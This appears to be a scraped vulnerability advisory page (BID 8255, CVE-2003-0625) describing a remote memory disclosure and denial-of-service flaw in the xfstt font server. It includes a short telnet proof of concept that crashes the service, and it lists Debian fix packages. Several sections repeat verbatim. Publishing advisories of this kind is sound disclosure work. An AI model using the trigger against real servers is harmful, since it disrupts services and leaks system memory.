xfstt Unspecified Memory Disclosure Vulnerability
BID:8255
Info
xfstt Unspecified Memory Disclosure Vulnerability
| Bugtraq ID: | 8255 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2003-0625 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 23 2003 12:00AM |
| Updated: | Jul 11 2009 10:56PM |
| Credit: | Discovery of this issue is credited to Vade 79 <[email protected]>. |
| Vulnerable: |
xfstt xfstt 1.4 xfstt xfstt 1.2.1 |
| Not Vulnerable: | |
Discussion
xfstt Unspecified Memory Disclosure Vulnerability
xfstt is reported to be prone to an unspecified memory disclosure vulnerability. This issue can be triggered by remote attackers to cause a denial of service. The server may also return details about the memory layout of the underlying system when this issue is triggered.
xfstt is reported to be prone to an unspecified memory disclosure vulnerability. This issue can be triggered by remote attackers to cause a denial of service. The server may also return details about the memory layout of the underlying system when this issue is triggered.
Exploit / POC
xfstt Unspecified Memory Disclosure Vulnerability
The following proof-of-concept was provided:
# telnet localhost 7101
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
xxxxxxx
HDxxxxxxx
þ@Connection closed by foreign host.
The following proof-of-concept was provided:
# telnet localhost 7101
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
xxxxxxx
HDxxxxxxx
þ@Connection closed by foreign host.
Solution / Fix
xfstt Unspecified Memory Disclosure Vulnerability
Solution:
Debian has released a security advisory (DSA 360-1) that contains fixes to address this issue. Information relating to obtaining and applying fixes can be found in the referenced advisory.
xfstt xfstt 1.2.1
Solution:
Debian has released a security advisory (DSA 360-1) that contains fixes to address this issue. Information relating to obtaining and applying fixes can be found in the referenced advisory.
xfstt xfstt 1.2.1
-
Debian xfstt_1.2.1-3_alpha.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/x/xfstt/xfstt_1.2.1-3_alp ha.deb -
Debian xfstt_1.2.1-3_arm.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/x/xfstt/xfstt_1.2.1-3_arm .deb -
Debian xfstt_1.2.1-3_hppa.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/x/xfstt/xfstt_1.2.1-3_hpp a.deb -
Debian xfstt_1.2.1-3_i386.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/x/xfstt/xfstt_1.2.1-3_i38 6.deb -
Debian xfstt_1.2.1-3_ia64.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/x/xfstt/xfstt_1.2.1-3_ia6 4.deb -
Debian xfstt_1.2.1-3_m68k.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/x/xfstt/xfstt_1.2.1-3_m68 k.deb -
Debian xfstt_1.2.1-3_mips.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/x/xfstt/xfstt_1.2.1-3_mip s.deb -
Debian xfstt_1.2.1-3_mipsel.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/x/xfstt/xfstt_1.2.1-3_mip sel.deb -
Debian xfstt_1.2.1-3_powerpc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/x/xfstt/xfstt_1.2.1-3_pow erpc.deb -
Debian xfstt_1.2.1-3_s390.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/x/xfstt/xfstt_1.2.1-3_s39 0.deb -
Debian xfstt_1.2.1-3_sparc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/x/xfstt/xfstt_1.2.1-3_spa rc.deb